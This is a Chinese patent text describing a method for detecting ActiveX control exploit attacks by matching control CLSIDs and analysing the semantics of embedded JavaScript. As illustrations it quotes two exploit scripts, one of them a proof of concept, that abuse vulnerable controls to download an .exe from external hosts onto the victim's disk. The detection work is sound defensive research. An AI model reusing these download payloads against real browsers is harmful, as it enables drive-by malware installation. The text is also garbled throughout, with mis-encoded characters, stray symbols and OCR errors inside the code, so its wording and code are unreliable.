專(zhuān)利名稱(chēng):檢測(cè)漏洞攻擊行為的方法及設(shè)備的制作方法
技術(shù)領(lǐng)域:
本發(fā)明涉及網(wǎng)絡(luò)安全技術(shù)領(lǐng)域�����,尤其涉及一種檢測(cè)漏洞攻擊行為的方法及設(shè)備�。
背景技術(shù):
ActiveX是微軟引入的基于組件對(duì)象模型(Component Object Model, COM)和對(duì) 象連接與嵌入(Object Linking and Embedding, OLE)的控件���。COM組件的開(kāi)發(fā)是為了簡(jiǎn) 化代碼的重用��,通過(guò)建立帶有接口的對(duì)象����,以被其他COM組件以及程序調(diào)用����。因此,COM組 件被廣泛用于開(kāi)發(fā)網(wǎng)絡(luò)瀏覽器的第三方應(yīng)用程序即插件����。但由于編程方面的原因,ActiveX 控件出現(xiàn)越來(lái)越多的漏洞�����。惡意的網(wǎng)站來(lái)利用ActiveX控件的漏洞����,通過(guò)溢出或者是功能 代碼的注入來(lái)侵害個(gè)人電腦。這種利用ActiveX控件漏洞侵害個(gè)人電腦的行為即ActiveX 漏洞攻擊行為�。 現(xiàn)有技術(shù)中,檢測(cè)ActiveX漏洞攻擊行為的方法需要基于規(guī)則即控件標(biāo)識(shí)(CLASS ID���, Clsid)�。具體地���,特征檢測(cè)引擎根據(jù)HTTP GET�����、 POST����、 COOKIE的請(qǐng)求獲取HTTP頁(yè)面的 數(shù)據(jù)流�,分析數(shù)據(jù)流中的的數(shù)據(jù)包是否與規(guī)則匹配,比如��,數(shù)據(jù)流中是否包含可能發(fā)起漏洞 攻擊的控件的Clsid�����,當(dāng)包含時(shí),說(shuō)明該HTTP頁(yè)面可能會(huì)發(fā)起ActiveX漏洞攻擊行為���,則入 侵檢測(cè)系統(tǒng)記入日志��,并發(fā)出報(bào)警�����;否則����,丟棄檢測(cè)結(jié)果�����,其中�,Clsid數(shù)據(jù)庫(kù)用于保存可能 會(huì)發(fā)起ActiveX漏洞攻擊行為的控件的Clsid。 在實(shí)現(xiàn)本發(fā)明的過(guò)程中�����,發(fā)明人發(fā)現(xiàn)由于Clsid數(shù)據(jù)庫(kù)中保存的Clsid只是表示 具有該Clsid的網(wǎng)絡(luò)數(shù)據(jù)有可能發(fā)起ActiveX漏洞攻擊行為�,并且ActiveX漏洞攻擊行為 的行為是變化的����,因而存在漏報(bào)率高�、誤報(bào)率高的問(wèn)題�。
發(fā)明內(nèi)容
本發(fā)明實(shí)施例提出一種檢測(cè)漏洞攻擊行為的方法及設(shè)備,以對(duì)ActiveX漏洞攻擊 行為進(jìn)行檢測(cè)���,有效提高了漏洞攻擊行為檢測(cè)的準(zhǔn)確率�,同時(shí)降低了漏洞攻擊行為檢測(cè)的 漏報(bào)率�。 本發(fā)明實(shí)施例提供了一種檢測(cè)漏洞攻擊行為的方法,包括
查找網(wǎng)絡(luò)數(shù)據(jù)中的控件是否為具有漏洞的控件���; 如果查找結(jié)果為是具有漏洞的控件���,從所述網(wǎng)絡(luò)數(shù)據(jù)中抽取包含所述控件的腳本 語(yǔ)句; 獲取所述腳本語(yǔ)句的語(yǔ)義���; 根據(jù)所述腳本語(yǔ)句的語(yǔ)義判斷所述腳本語(yǔ)句中是否存在攻擊行為特征����; 如果判斷結(jié)果為存在攻擊行為特征�����,則確定所述網(wǎng)絡(luò)數(shù)據(jù)中存在漏洞攻擊行為。 本發(fā)明實(shí)施例還提供了一種檢測(cè)漏洞攻擊行為的設(shè)備����,包括 控件檢測(cè)單元,用于查找網(wǎng)絡(luò)數(shù)據(jù)中的控件是否為具有漏洞的控件����; 腳本抽取單元,用于在查找結(jié)果為具有漏洞的控件的情況下�,從所述網(wǎng)絡(luò)數(shù)據(jù)中
抽取包含所述控件的腳本語(yǔ)句;
語(yǔ)義獲取單元��,用于獲取所述腳本語(yǔ)句的語(yǔ)義��; 行為判斷單元��,用于根據(jù)所述腳本語(yǔ)句的語(yǔ)義判斷所述腳本語(yǔ)句中是否存在攻擊 行為特征��; 攻擊行為確定單元�,用于在所述行為判斷單元判斷結(jié)果為存在攻擊行為特征的情 況下,則確定所述網(wǎng)絡(luò)數(shù)據(jù)中存在漏洞攻擊行為��。 上述實(shí)施例提供的技術(shù)方案通過(guò)對(duì)存在漏洞的控件的網(wǎng)絡(luò)數(shù)據(jù)進(jìn)行語(yǔ)義檢測(cè)及 行為匹配���,可以對(duì)潛在的漏洞攻擊行為進(jìn)行更加深入的分析��,也可以排除具有漏洞的控件 的正常行為�����,有效提高了漏洞攻擊行為檢測(cè)的準(zhǔn)確率�����,同時(shí)降低了漏洞攻擊行為檢測(cè)的漏 報(bào)率���。 下面通過(guò)附圖和實(shí)施例,對(duì)本發(fā)明的技術(shù)方案做進(jìn)一步的詳細(xì)描述�。
為了更清楚地說(shuō)明本發(fā)明實(shí)施例中的技術(shù)方案,下面將對(duì)實(shí)施例中所需要使用的 附圖作簡(jiǎn)單地介紹���,顯而易見(jiàn)地��,下面描述中的附圖僅僅是本發(fā)明的一些實(shí)施例��,對(duì)于本領(lǐng) 域普通技術(shù)人員來(lái)講��,在不付出創(chuàng)造性勞動(dòng)的前提下��,還可以根據(jù)這些附圖獲得其他的附 圖�。
圖1為本發(fā)明實(shí)施例提供的一種檢測(cè)漏洞攻擊行為的方法的流程圖; 圖2為本發(fā)明實(shí)施例提供的另一種檢測(cè)漏洞攻擊行為的方法的流程圖�; 圖3為圖2所示實(shí)施例的分階段示意圖; 圖4為圖2所示實(shí)施例的應(yīng)用示意圖�; 圖5為圖2所示實(shí)施例中語(yǔ)義檢測(cè)的示意圖; 圖6為第一腳本的語(yǔ)義狀態(tài)示意圖���; 圖7為第二腳本的語(yǔ)義狀態(tài)示意圖�; 圖8為本發(fā)明實(shí)施例提供的檢測(cè)漏洞攻擊行為的設(shè)備結(jié)構(gòu)示意圖���。
具體實(shí)施例方式
下面將結(jié)合本發(fā)明實(shí)施例中的附圖����,對(duì)本發(fā)明實(shí)施例中的技術(shù)方案進(jìn)行清楚�����、完 整地描述��,顯然����,所描述的實(shí)施例僅僅是本發(fā)明一部分實(shí)施例�����,而不是全部的實(shí)施例����?�;?本發(fā)明中的實(shí)施例��,本領(lǐng)域普通技術(shù)人員在沒(méi)有作出創(chuàng)造性勞動(dòng)前提下所獲得的所有其他 實(shí)施例�,都屬于本發(fā)明保護(hù)的范圍����。 圖1為本發(fā)明實(shí)施例提供的一種檢測(cè)漏洞攻擊行為的方法的流程圖。該方法包 括 步驟11���、查找網(wǎng)絡(luò)數(shù)據(jù)中的控件是否為具有漏洞的控件����;如可通過(guò)檢測(cè)并獲取網(wǎng) 絡(luò)數(shù)據(jù)中控件的標(biāo)識(shí)Clsid來(lái)查找找網(wǎng)絡(luò)數(shù)據(jù)中的控件是否為具有漏洞的控件�����。在預(yù)設(shè)的 具有漏洞的控件的標(biāo)識(shí)庫(kù)中查找獲取的控件的標(biāo)識(shí);如果找到�����,則所述網(wǎng)絡(luò)數(shù)據(jù)中的控件 為具有漏洞的控件�。 步驟12、如果查找結(jié)果為是具有漏洞的控件��,從所述網(wǎng)絡(luò)數(shù)據(jù)中抽取包含所述控 件的腳本語(yǔ)句��。
步驟13���、獲取所述腳本語(yǔ)句的語(yǔ)義����;例如將所述腳本語(yǔ)句分割為腳本語(yǔ)句塊�,如按標(biāo)點(diǎn)符號(hào)進(jìn)行分割;然后根據(jù)所述腳本語(yǔ)句塊的語(yǔ)義以及所述腳本語(yǔ)句塊在腳本語(yǔ)句中 的排列順序判斷所述腳本語(yǔ)句的語(yǔ)義�����,如將所述腳本語(yǔ)句塊的語(yǔ)義作為狀態(tài)參數(shù)�,按照所 述腳本語(yǔ)句塊在腳本語(yǔ)句中的排列順序排列所述狀態(tài)參數(shù),通過(guò)預(yù)先設(shè)置的模型計(jì)算所述 腳本語(yǔ)句的語(yǔ)義。具體詳見(jiàn)第一腳本����、第二腳本的分析說(shuō)明。 步驟14���、根據(jù)所述腳本語(yǔ)句的語(yǔ)義判斷所述腳本語(yǔ)句中是否存在攻擊行為特征��;
如根據(jù)所述腳本語(yǔ)句的語(yǔ)義判斷所述腳本語(yǔ)句中是否存在網(wǎng)頁(yè)重定向的特征����。 步驟15�����、如果判斷結(jié)果為存在攻擊行為特征���,則確定所述網(wǎng)絡(luò)數(shù)據(jù)中存在漏洞攻
擊行為。如當(dāng)所述腳本語(yǔ)句中存在網(wǎng)頁(yè)重定向的特征時(shí)��,則確定網(wǎng)絡(luò)數(shù)據(jù)中存在攻擊行為特征��。 本實(shí)施例提供的技術(shù)方案通過(guò)對(duì)存在漏洞的控件的網(wǎng)絡(luò)數(shù)據(jù)進(jìn)行語(yǔ)義檢測(cè)及行 為匹配���,可以對(duì)潛在的漏洞攻擊行為進(jìn)行更加深入的分析�����,也可以排除具有漏洞的控件的 正常行為�����,有效提高了漏洞攻擊行為檢測(cè)的準(zhǔn)確率�,同時(shí)降低了漏洞攻擊行為檢測(cè)的漏報(bào)率。 圖2為本發(fā)明實(shí)施例提供的另一種檢測(cè)漏洞攻擊行為的方法的流程圖��。該方法包 括 步驟21�、檢測(cè)并獲取網(wǎng)絡(luò)數(shù)據(jù)如ActiveX腳本中的Clsid的值; 步驟22�、在所述Clsid的值為有漏洞的控件對(duì)應(yīng)的Clsid值的情況下,檢測(cè)所述網(wǎng)
絡(luò)數(shù)據(jù)的語(yǔ)義狀態(tài)����; 步驟23、判斷所述語(yǔ)義狀態(tài)是否符合存在漏洞攻擊行為的網(wǎng)絡(luò)數(shù)據(jù)的語(yǔ)義狀態(tài)轉(zhuǎn) 移特征����; 步驟24、當(dāng)所述語(yǔ)義狀態(tài)符合所述語(yǔ)義狀態(tài)轉(zhuǎn)移特征時(shí)���,將導(dǎo)致所述語(yǔ)義狀態(tài)轉(zhuǎn) 移的行為與攻擊行為特征進(jìn)行匹配����; 步驟25、根據(jù)匹配結(jié)果檢測(cè)所述網(wǎng)絡(luò)數(shù)據(jù)是否存在控件漏洞攻擊行為�。具體地,當(dāng) 導(dǎo)致所述語(yǔ)義狀態(tài)的行為與攻擊行為特征匹配時(shí)��,則說(shuō)明所述網(wǎng)絡(luò)數(shù)據(jù)存在攻擊行為�����,從 而可以執(zhí)行報(bào)警等預(yù)防措施��;當(dāng)導(dǎo)致所述語(yǔ)義狀態(tài)的行為與攻擊行為特征不匹配時(shí)��,則說(shuō) 明所述網(wǎng)絡(luò)數(shù)據(jù)不存在攻擊行為��。 上述步驟21 步驟25可由檢測(cè)引擎分為兩個(gè)階段執(zhí)行�,具體如圖3所示。
第一個(gè)階段即上述步驟21��,根據(jù)HTTP GET�、 P0ST���、 COOKIE的請(qǐng)求獲取所請(qǐng)求的 HTTP的頁(yè)面的數(shù)據(jù)流���;檢測(cè)引擎對(duì)數(shù)據(jù)流進(jìn)行HTTP解碼和HTML解碼�����,將解碼得到的數(shù)據(jù) 進(jìn)行重組�,還原成具有一個(gè)完整數(shù)據(jù)包的HTTP的頁(yè)面���。檢測(cè)引擎對(duì)重組得到的HTTP的頁(yè) 面的數(shù)據(jù)包進(jìn)行Clsid分析�,并利用HMM提取其中的JavaScript腳本�����,進(jìn)行語(yǔ)法檢測(cè)���。若 數(shù)據(jù)包中的Clsid值為有漏洞的控件對(duì)應(yīng)的Clsid值���,且JavaScript腳本語(yǔ)法正確,則進(jìn) 入第二階段��,檢測(cè)JavaScript腳本的語(yǔ)義及行為���,在語(yǔ)義狀態(tài)符合預(yù)設(shè)的語(yǔ)義狀態(tài)特征��, 且行為符合攻擊行為特征�����,則進(jìn)行ActiveX漏洞攻擊行為告警�����,控制臺(tái)顯示報(bào)警頁(yè)面�����。如圖 4所示���,若數(shù)據(jù)包中的Clsid值為可直接判定網(wǎng)絡(luò)數(shù)據(jù)存在ActiveX漏洞攻擊行為的Clsid 值����,這類(lèi)Clsid值出現(xiàn)機(jī)率較低���,則可直接認(rèn)定檢測(cè)的網(wǎng)絡(luò)數(shù)據(jù)存在ActiveX漏洞攻擊行 為��,從而控制臺(tái)可直接顯示報(bào)警頁(yè)面�。 第二階段即上述步驟22 步驟25����,對(duì)第一階段提取的JavaScript腳本進(jìn)行 語(yǔ)義狀態(tài)檢測(cè),以及行為匹配����,然后根據(jù)攻擊行為關(guān)聯(lián)分析和異常值進(jìn)行打分,最后進(jìn)行報(bào)警����。其中語(yǔ)義檢測(cè)具體如圖5所示,提取腳本中的語(yǔ)義特征如對(duì) 象�����、行為以及該行為的輸出��,構(gòu)建語(yǔ)句塊序列���,即語(yǔ)義狀態(tài)網(wǎng)絡(luò)�����,獲取語(yǔ)義狀態(tài)情況��。當(dāng)語(yǔ)義 轉(zhuǎn)移到一個(gè)終態(tài)時(shí)�, 一個(gè)攻擊行為即被識(shí)別出來(lái)。構(gòu)造ActiveX漏洞攻擊行為的檢測(cè)特征 語(yǔ)義狀態(tài)網(wǎng)絡(luò)中�,可以正則表達(dá)式的方式表述特征語(yǔ)義,以自動(dòng)機(jī)機(jī)制判斷語(yǔ)義狀態(tài)�。
以第一腳本為例 "〈HTML〉 〈B0DY〉 〈object id = hsmx classid = 〃 clsid: {97AF4A45-49BE-4485-9F55-91AB40 F2 88F2} 〃 X/object〉 〈SCRIPT〉 function Do_it()
{ File = 〃 http:〃test. com/file, exe〃 hsmx. OpenWebFile(File) } 〈/SCRIPT〉 〈i即ut language = JavaScript onclick = Do—it () type = button value =〃 exploit" > 〈/body> 〈/HTML>" Clsid值也可以位于網(wǎng)絡(luò)數(shù)據(jù)中的腳本中,也可以位于腳本以外的數(shù)據(jù)中���。這里�����, Clsid值位于腳本中�。將第一腳本中的Clsid值"97AF4A45-49BE-4485-9F55-91AB40F288 F2"與Clsid庫(kù)進(jìn)行匹配�,如果和具有漏洞的控件的標(biāo)識(shí)值相匹配,可知該Clsid值為某一 具有漏洞的控件標(biāo)識(shí)��。 提取的腳本中��,依據(jù)回車(chē)進(jìn)行語(yǔ)句塊切分���。其中函數(shù)"Do」t()"為一個(gè)語(yǔ)句塊�����。該 語(yǔ)句塊中���,依據(jù)回車(chē)又可以分為"File =〃 http:〃test. com/file, exe"語(yǔ)句塊即對(duì)象語(yǔ) 句土央,及"hsmx 0penWebFile(File)"語(yǔ)句塊即行為語(yǔ)句塊����。 提取腳本中的對(duì)象語(yǔ)句塊"File = 〃 http:〃test. com/file, exe〃 "、行為語(yǔ)句 塊"OpenWebFile(File)"���。其中行為語(yǔ)句塊調(diào)用對(duì)象語(yǔ)句塊時(shí)���,通過(guò)判斷對(duì)象中包含有結(jié)構(gòu) 頭http:〃,產(chǎn)生網(wǎng)絡(luò)重定向語(yǔ)句塊即行為的輸出語(yǔ)句塊��。利用對(duì)象語(yǔ)句塊��、行為語(yǔ)句塊及 行為的輸出語(yǔ)句塊組建語(yǔ)義狀態(tài)網(wǎng)絡(luò)或語(yǔ)句塊排序�����,得到如圖6所示的語(yǔ)義狀態(tài)情況�����。對(duì) 象"File =〃 http://test.com/file.exe""語(yǔ)句塊通過(guò)行為"0penWebFile (File)"語(yǔ)句 塊,得到最終的狀態(tài)網(wǎng)頁(yè)重定向語(yǔ)句塊�����。該語(yǔ)句塊序列符合存在ActiveX漏洞攻擊行為�,即 網(wǎng)頁(yè)重定向的JavaScript腳本語(yǔ)義狀態(tài)特征,且行為"0penWebFile (File)"與ActiveX攻 擊行為特征匹配����,因此,該第一腳本存在ActiveX漏洞攻擊行為�。
類(lèi)似地,第二腳本"〈html〉
〈body〉 〈div style =〃 visibility:hidden ; 〃 >
7
〈object classid = ' clsid: 18A295DA-088E-42D1-BE31-5028D7F9B965'
id=, k upa' X/object> 〈script type =〃 text/javascript〃 > try { var obj = document. getElementByld(' kupa'); var rem = 〃 http://www.adalex.pl/motyl/motyl_radio.exe"; varloc=〃 C:\evil.exe"; obj. HttpDownloadFile(rem,loc); } catch(err) { window, alert (' Poc failed'); } 〈/script> 〈/div> 〈/body> 〈/html〉"的語(yǔ)義狀態(tài)如圖7所示�����,第二腳本的函數(shù)"try"語(yǔ)句塊中�,對(duì)象 1 "' rem'"語(yǔ)句塊、對(duì)象2 " loc"語(yǔ)句塊作為行為"HttpDownloadFile ()"語(yǔ)句塊的輸入�����, 由于"rem"包含"http:〃"的結(jié)構(gòu)頭�,因而"HttpDownloadFile"執(zhí)行網(wǎng)絡(luò)重定向���,即產(chǎn)生 網(wǎng)頁(yè)重定向語(yǔ)句塊。符合存在ActiveX漏洞攻擊行為的JavaScript腳本語(yǔ)義狀態(tài)特征�����,且 行為"HttpDoenloadFile ()"與ActiveX攻擊行為特征匹配����,因此��,該第二腳本存在ActiveX 漏洞攻擊行為��。 本實(shí)施例提供的技術(shù)方案通過(guò)對(duì)存在漏洞的控件的網(wǎng)絡(luò)數(shù)據(jù)進(jìn)行語(yǔ)義檢測(cè)及行 為匹配�����,可以對(duì)潛在的漏洞攻擊行為進(jìn)行更加深入的分析���,也可以排除具有漏洞的控件的 正常行為�,有效提高了漏洞攻擊行為檢測(cè)的準(zhǔn)確率����,同時(shí)降低了漏洞攻擊行為檢測(cè)的漏報(bào)率����。 圖8為本發(fā)明實(shí)施例提供的檢測(cè)漏洞攻擊行為的設(shè)備結(jié)構(gòu)示意圖�����。該系統(tǒng)包括 控件檢測(cè)單元81�、腳本抽取單元82、語(yǔ)義獲取單元83���、行為判斷單元84及攻擊行為確定單 元85�����?�?丶z測(cè)單元81用于查找網(wǎng)絡(luò)數(shù)據(jù)中的控件是否為具有漏洞的控件�����;腳本抽取單元 82用于在查找結(jié)果為具有漏洞的控件的情況下���,從所述網(wǎng)絡(luò)數(shù)據(jù)中抽取包含所述控件的腳 本語(yǔ)句;語(yǔ)義獲取單元83用于獲取所述腳本語(yǔ)句的語(yǔ)義���;行為判斷單元84用于根據(jù)所述 腳本語(yǔ)句的語(yǔ)義判斷所述腳本語(yǔ)句中是否存在攻擊行為特征�;攻擊行為確定單元85用于 在所述行為判斷單元判斷結(jié)果為存在攻擊行為特征的情況下,則確定所述網(wǎng)絡(luò)數(shù)據(jù)中存在 漏洞攻擊行為�。所述行為判斷單元84可用于根據(jù)所述腳本語(yǔ)句的語(yǔ)義判斷所述腳本語(yǔ)句 中是否存在網(wǎng)頁(yè)重定向的特征,如可具體用于根據(jù)所述腳本語(yǔ)句的語(yǔ)義判斷所述腳本語(yǔ)句 中是否存在"http"字符串����。。 本實(shí)施例提供的檢測(cè)漏洞攻擊行為的設(shè)備通過(guò)控件檢測(cè)單元81對(duì)存在漏洞的控 件的網(wǎng)絡(luò)數(shù)據(jù)進(jìn)行語(yǔ)義檢測(cè)及行為匹配��,使得當(dāng)根據(jù)Clsid確定控件的方法不能準(zhǔn)確判斷 出該網(wǎng)絡(luò)數(shù)據(jù)存在漏洞攻擊行為時(shí)���,以及攻擊行為變化時(shí)�,通過(guò)腳本抽取單元82�����、語(yǔ)義獲取單元83�����、行為判斷單元84及攻擊行為確定單元85對(duì)網(wǎng)絡(luò)數(shù)據(jù)中的語(yǔ)義狀態(tài)情況或者行為 特征的判斷�,仍然能夠準(zhǔn)確檢測(cè)出存在攻擊行為的網(wǎng)絡(luò)數(shù)據(jù)�����,提高了報(bào)警的準(zhǔn)確度,降低了 漏洞攻擊行為的漏報(bào)率及誤報(bào)率��。 所述語(yǔ)義獲取單元83包括腳本分割子單元831及語(yǔ)義判斷子單元832�����。腳本分 割子單元831用于將所述腳本語(yǔ)句分割為腳本語(yǔ)句塊�;語(yǔ)義判斷子單元832用于根據(jù)所述 腳本語(yǔ)句塊的語(yǔ)義以及所述腳本語(yǔ)句塊在腳本語(yǔ)句中的排列順序判斷所述腳本語(yǔ)句的語(yǔ) 義。 所述語(yǔ)義判斷子單元832包括參數(shù)選定子單元833���、參數(shù)排列子單元834及語(yǔ)義 計(jì)算子單元835��。參數(shù)選定子單元833用于將所述腳本語(yǔ)句塊的語(yǔ)義作為狀態(tài)參數(shù)����;參數(shù) 排列子單元834用于按照所述腳本語(yǔ)句塊在腳本語(yǔ)句中的排列順序排列所述狀態(tài)參數(shù)����;語(yǔ) 義計(jì)算子單元835用于通過(guò)預(yù)先設(shè)置的模型計(jì)算所述腳本語(yǔ)句的語(yǔ)義。
本發(fā)明實(shí)施例提供的檢測(cè)漏洞攻擊行為的設(shè)備還可包括報(bào)警單元86��。報(bào)警單元 86用于進(jìn)行漏洞攻擊行為報(bào)警���。當(dāng)攻擊行為確定單元85確定所述網(wǎng)絡(luò)數(shù)據(jù)存在攻擊行為 時(shí)�,報(bào)警單元86進(jìn)行漏洞攻擊行為報(bào)警。 上述方法及系統(tǒng)實(shí)施例通過(guò)對(duì)存在漏洞的控件的網(wǎng)絡(luò)數(shù)據(jù)進(jìn)行語(yǔ)義檢測(cè)及行為 匹配���,可以對(duì)潛在的漏洞攻擊行為進(jìn)行更加深入的分析�,也可以排除具有漏洞的控件的正 常行為��,有效提高了漏洞攻擊行為檢測(cè)的準(zhǔn)確率��,同時(shí)降低了漏洞攻擊行為檢測(cè)的漏報(bào)率��。
本領(lǐng)域普通技術(shù)人員可以理解實(shí)現(xiàn)上述方法實(shí)施例的全部或部分步驟可以通過(guò) 程序指令相關(guān)的硬件來(lái)完成��,前述的程序可以存儲(chǔ)于一計(jì)算機(jī)可讀取存儲(chǔ)介質(zhì)中��,該程序 在執(zhí)行時(shí)����,執(zhí)行包括上述方法實(shí)施例的步驟����;而前述的存儲(chǔ)介質(zhì)包括R0M、 RAM����、磁碟或者 光盤(pán)等各種可以存儲(chǔ)程序代碼的介質(zhì)����。 最后應(yīng)說(shuō)明的是以上實(shí)施例僅用以說(shuō)明本發(fā)明的技術(shù)方案��,而非對(duì)其限制����;盡 管參照前述實(shí)施例對(duì)本發(fā)明進(jìn)行了詳細(xì)的說(shuō)明,本領(lǐng)域的普通技術(shù)人員應(yīng)當(dāng)理解其依然 可以對(duì)前述各實(shí)施例所記載的技術(shù)方案進(jìn)行修改����,或者對(duì)其中部分技術(shù)特征進(jìn)行等同替 換;而這些修改或者替換��,并不使相應(yīng)技術(shù)方案的本質(zhì)脫離本發(fā)明各實(shí)施例技術(shù)方案的精 神和范圍����。
權(quán)利要求
一種檢測(cè)漏洞攻擊行為的方法,其特征在于��,包括查找網(wǎng)絡(luò)數(shù)據(jù)中的控件是否為具有漏洞的控件���;如果查找結(jié)果為是具有漏洞的控件����,從所述網(wǎng)絡(luò)數(shù)據(jù)中抽取包含所述控件的腳本語(yǔ)句;獲取所述腳本語(yǔ)句的語(yǔ)義��;根據(jù)所述腳本語(yǔ)句的語(yǔ)義判斷所述腳本語(yǔ)句中是否存在攻擊行為特征�����;如果判斷結(jié)果為存在攻擊行為特征���,則確定所述網(wǎng)絡(luò)數(shù)據(jù)中存在漏洞攻擊行為�。
2. 根據(jù)權(quán)利要求1所述的檢測(cè)漏洞攻擊行為的方法��,其特征在于�,所述獲取所述腳本 語(yǔ)句的語(yǔ)義包括將所述腳本語(yǔ)句分割為腳本語(yǔ)句塊;根據(jù)所述腳本語(yǔ)句塊的語(yǔ)義以及所述腳本語(yǔ)句塊在腳本語(yǔ)句中的排列順序判斷所述 腳本語(yǔ)句的語(yǔ)義����。
3. 根據(jù)權(quán)利要求2所述的檢測(cè)漏洞攻擊行為的方法,其特征在于���,根據(jù)所述腳本語(yǔ)句 塊的語(yǔ)義以及所述腳本語(yǔ)句塊在腳本語(yǔ)句中的排列順序判斷所述腳本語(yǔ)句的語(yǔ)義,包括將所述腳本語(yǔ)句塊的語(yǔ)義作為狀態(tài)參數(shù)��;按照所述腳本語(yǔ)句塊在腳本語(yǔ)句中的排列順序排列所述狀態(tài)參數(shù); 通過(guò)預(yù)先設(shè)置的模型計(jì)算所述腳本語(yǔ)句的語(yǔ)義����。
4. 根據(jù)權(quán)利要求1或2或3所述的檢測(cè)漏洞攻擊行為的方法,其特征在于����,根據(jù)所述腳 本語(yǔ)句的語(yǔ)義判斷所述腳本語(yǔ)句中是否存在攻擊行為特征,包括根據(jù)所述腳本語(yǔ)句的語(yǔ)義判斷所述腳本語(yǔ)句中是否存在網(wǎng)頁(yè)重定向的特征�。
5. 根據(jù)權(quán)利要求4所述的檢測(cè)漏洞攻擊行為的方法,其特征在于����,所述根據(jù)所述腳本 語(yǔ)句的語(yǔ)義判斷所述腳本語(yǔ)句中是否存在網(wǎng)頁(yè)重定向的特征,包括根據(jù)所述腳本語(yǔ)句的語(yǔ)義判斷所述腳本語(yǔ)句中是否存在"http"字符串����。
6. —種檢測(cè)漏洞攻擊行為的設(shè)備,其特征在于�,包括 控件檢測(cè)單元,用于查找網(wǎng)絡(luò)數(shù)據(jù)中的控件是否為具有漏洞的控件���;腳本抽取單元����,用于在查找結(jié)果為具有漏洞的控件的情況下,從所述網(wǎng)絡(luò)數(shù)據(jù)中抽取 包含所述控件的腳本語(yǔ)句��;語(yǔ)義獲取單元��,用于獲取所述腳本語(yǔ)句的語(yǔ)義��;行為判斷單元���,用于根據(jù)所述腳本語(yǔ)句的語(yǔ)義判斷所述腳本語(yǔ)句中是否存在攻擊行為 特征�����;攻擊行為確定單元���,用于在所述行為判斷單元判斷結(jié)果為存在攻擊行為特征的情況 下,則確定所述網(wǎng)絡(luò)數(shù)據(jù)中存在漏洞攻擊行為����。
7. 根據(jù)權(quán)利要求6所述的檢測(cè)漏洞攻擊行為的設(shè)備,其特征在于�,所述語(yǔ)義獲取單元 包括腳本分割子單元,用于將所述腳本語(yǔ)句分割為腳本語(yǔ)句塊�����;語(yǔ)義判斷子單元�����,用于根據(jù)所述腳本語(yǔ)句塊的語(yǔ)義以及所述腳本語(yǔ)句塊在腳本語(yǔ)句中 的排列順序判斷所述腳本語(yǔ)句的語(yǔ)義��。
8. 根據(jù)權(quán)利要求7所述的檢測(cè)漏洞攻擊行為的設(shè)備����,其特征在于,所述語(yǔ)義判斷子單 元包括參數(shù)選定子單元�,用于將所述腳本語(yǔ)句塊的語(yǔ)義作為狀態(tài)參數(shù);參數(shù)排列子單元�,用于按照所述腳本語(yǔ)句塊在腳本語(yǔ)句中的排列順序排列所述狀態(tài)參數(shù);語(yǔ)義計(jì)算子單元���,用于通過(guò)預(yù)先設(shè)置的模型計(jì)算所述腳本語(yǔ)句的語(yǔ)義����。
9. 根據(jù)權(quán)利要求6至8中任一項(xiàng)所述的檢測(cè)漏洞攻擊行為的設(shè)備����,其特征在于�,所述行 為判斷單元用于根據(jù)所述腳本語(yǔ)句的語(yǔ)義判斷所述腳本語(yǔ)句中是否存在網(wǎng)頁(yè)重定向的特 征����。
10. 根據(jù)權(quán)利要求9所述的檢測(cè)漏洞攻擊行為的設(shè)備,其特征在于��,所述行為判斷單元 具體用于根據(jù)所述腳本語(yǔ)句的語(yǔ)義判斷所述腳本語(yǔ)句中是否存在"http "字符串���。
全文摘要
本發(fā)明涉及一種檢測(cè)漏洞攻擊行為的方法及設(shè)備��,方法包括查找網(wǎng)絡(luò)數(shù)據(jù)中的控件是否為具有漏洞的控件�;如果查找結(jié)果為是具有漏洞的控件����,從所述網(wǎng)絡(luò)數(shù)據(jù)中抽取包含所述控件的腳本語(yǔ)句;獲取所述腳本語(yǔ)句的語(yǔ)義�;根據(jù)所述腳本語(yǔ)句的語(yǔ)義判斷所述腳本語(yǔ)句中是否存在攻擊行為特征;如果判斷結(jié)果為存在攻擊行為特征�����,則確定所述網(wǎng)絡(luò)數(shù)據(jù)中存在漏洞攻擊行為����。通過(guò)對(duì)網(wǎng)絡(luò)數(shù)據(jù)中的語(yǔ)義狀態(tài)情況以及行為特征的判斷�����,仍然能夠準(zhǔn)確檢測(cè)出存在攻擊行為的網(wǎng)絡(luò)數(shù)據(jù)���,降低了漏洞攻擊行為的漏報(bào)率及誤報(bào)率����。
文檔編號(hào)G06F21/00GK101751530SQ20091025887
公開(kāi)日2010年6月23日 申請(qǐng)日期2009年12月29日 優(yōu)先權(quán)日2009年12月29日
發(fā)明者鄒榮新 申請(qǐng)人:成都市華為賽門(mén)鐵克科技有限公司